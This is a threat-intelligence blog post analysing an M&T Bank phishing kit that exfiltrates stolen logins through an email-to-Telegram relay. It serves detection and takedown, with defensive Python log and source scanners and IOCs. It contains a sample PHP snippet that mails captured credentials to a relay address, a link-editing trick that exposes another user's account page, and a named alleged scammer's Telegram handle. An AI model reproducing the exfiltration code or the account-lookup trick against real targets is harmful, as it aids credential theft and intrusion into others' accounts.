One of the latest kits downloaded by StalkPhish targets customers of the online bank M&T. It has a special feature that we wanted to share with you. We have already blogged about the use of Telegram by scammers, but this kit presents an interesting new trick.

First observations
As with many kits, the archive of this one has been left on the server by the scammer. We named this kit 'xx' because the archive contains an xx.php file. The kit is composed of only two pages: a PHP file to process the collected data and an HTML file:

The HTML page has nothing special: the links to the original site are kept, and the images are loaded from the original server, which makes this phishing kit particularly easy to detect as long as the HTTP Referer headers received by the legitimate server are monitored.
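As an added example (not code from the original post or from StalkPhish), here is the kind of Referer monitoring that would catch such a kit: it parses web server access logs for the bank's static assets and reports every Referer host that is not the bank's own. The log layout (Apache "combined" format), the hostname bank.example and the log lines themselves are constructed assumptions; the path fragments mbankss and Hajjjerr.htm are the ones quoted later in this post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access log in Apache "combined" format (an assumed layout).
# bank.example is a placeholder for the brand's real hostname.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Nov/2021:10:01:02 +0000] "GET /images/logo.png HTTP/1.1" 200 5120 "https://www.bank.example/login" "Mozilla/5.0"
203.0.113.11 - - [17/Nov/2021:10:01:05 +0000] "GET /images/logo.png HTTP/1.1" 200 5120 "http://cheap-host.example/mbankss/Hajjjerr.htm" "Mozilla/5.0"
203.0.113.12 - - [17/Nov/2021:10:01:09 +0000] "GET /css/site.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.13 - - [17/Nov/2021:10:01:12 +0000] "GET /images/logo.png HTTP/1.1" 200 5120 "https://evil.example/mt/login.html" "Mozilla/5.0"
"""

# One "combined" log line: ip ident user [ts] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Hostnames that legitimately embed our static assets (placeholder values).
ALLOWED_REFERER_HOSTS = {"www.bank.example", "bank.example"}
# Only asset requests matter here: a phishing page hot-links these from our server.
ASSET_PREFIXES = ("/images/", "/css/", "/js/")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def foreign_referers(log_text, allowed_hosts=ALLOWED_REFERER_HOSTS):
    """Return {referer_host: set(referer_urls)} for asset hits whose Referer host is not ours."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ASSET_PREFIXES):
            continue
        ref = rec["referer"]
        if ref in ("", "-"):
            continue  # direct hit or stripped Referer: no signal either way
        host = urlsplit(ref).hostname
        if host is None:
            continue
        host = host.lower()
        if host in allowed_hosts or any(host.endswith("." + h) for h in allowed_hosts):
            continue
        hits.setdefault(host, set()).add(ref)
    return hits


if __name__ == "__main__":
    # Each foreign host is a candidate phishing page hot-linking our images.
    for host, urls in foreign_referers(SAMPLE_LOG).items():
        print(host, sorted(urls))
```

Run over real logs, each reported host is a candidate phishing page worth fetching and comparing against known kit signatures; adding the page's full URL to the report (as done above) gives the takedown request its evidence directly.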
The collected data are then sent to the xx.php file:

Exfiltration script
The xx.php script looks similar to many phishing kits, and more specifically to an existing M&T Bank NFL kit (see https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_MTB_NFL.yar):

What is particularly interesting here is the email address.
Using Telegram through email address
While many scammers usually use Gmail, Yandex, Yahoo, Protonmail, etc. email addresses, this actor uses an etlgr.com email address. This domain belongs to a platform that reroutes data sent to an email address to a Telegram bot:

You just have to start a conversation with the proposed bot in your Telegram app to generate an email address:

Once the email address is generated, the attacker can declare it in the exfiltration script to send the stolen data, via email, to the Telegram bot.
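For hosting providers and incident responders cleaning a compromised webroot, the relay domain itself is a usable indicator: any recipient address on etlgr.com inside a PHP file is worth a look, and the local part is the Telegram chat ID described below. The following is an added example (not code from the original post or from StalkPhish) that scans PHP sources for recipient addresses on such relay domains; the sample script, the 123456789 chat ID and the bank.example hostname are constructed, and the relay-domain list contains only the domain seen in this kit.

```python
import os
import re

# Domains known to relay email to Telegram; etlgr.com is the one seen in this kit.
RELAY_DOMAINS = {"etlgr.com"}

# Loose but practical email matcher for source code.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Constructed sample in the style of these exfiltration scripts (not the real xx.php).
SAMPLE_PHP = r'''<?php
$ip = getenv("REMOTE_ADDR");
$message .= "User: ".$_POST['user']."\n";
$recipient = "123456789@etlgr.com";
$subject = "MT Result | ".$ip;
mail($recipient, $subject, $message, $headers);
header("Location: https://www.bank.example/");
?>'''


def find_relay_addresses(source, relay_domains=RELAY_DOMAINS):
    """Return [(address, chat_id)] for every address on a relay domain found in source."""
    found = []
    for addr in sorted(set(EMAIL_RE.findall(source))):
        local, _, domain = addr.rpartition("@")
        if domain.lower() in relay_domains:
            # For etlgr.com the local part is the bot's chat ID (see the OpSec section).
            found.append((addr, local))
    return found


def scan_tree(root, relay_domains=RELAY_DOMAINS, exts=(".php", ".phtml", ".inc")):
    """Walk a webroot and return {path: [(address, chat_id)]} for files that hit."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_relay_addresses(fh.read(), relay_domains)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    print(find_relay_addresses(SAMPLE_PHP))
```

The relay-domain list is deliberately short; extend it as you encounter other email-to-Telegram services, and keep the chat ID, since it is the pivot into the subscription page discussed next.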
The bot, the service and the OpSec
The bot offers a help section with commands to configure the service and subscription, as you can see here:

One of the most interesting commands is the subscription one, which you can use to retrieve information about your account… or the scammer's! This command generates a subscription management link to the subscription page, which uses your account ID.

You can then modify the link using the chat ID (in the email address, the ID before @etlgr.com) to access the scammer's information:

We can observe several things here:
- the scammer purchased a one-year subscription, which will expire on 2022-11-17
- you can pay using Bitcoin
- you can find a link to the subscriber's Telegram profile page:

You can then continue your investigation of the scammer if you want to go further, but this is not the purpose of this post.
Search and destroy
In order to search for this type of kit you can use the StalkPhish.io API URL search with the strings "Hajjjerr.htm" or "mbankss" (you can register for free on stalkphish.io here: https://stalkphish.io); you will retrieve a list of URLs where this phishing kit was installed:
$ curl -H "authorization: Token YOUR_STALKPHISH.IO_API_TOKEN" https://api.stalkphish.io/api/v1/search/url/Hajjjjerr.htm | jq

Then you can start your takeover campaign!
IOCs
Kit's zip file hash (SHA256):
f43a06a42b87920c300929003787fc3c6a3b7f0fb7f0f97726c9f2f3f8c0dd80
Contact e-mail:
784320094@etlgr[.]com
Associated scammer infos:
'Don Dari', '@dondarigh', https[:]//t.me/dondarigh
PhishingKit Yara Rule:
PK_MTB_xx.yar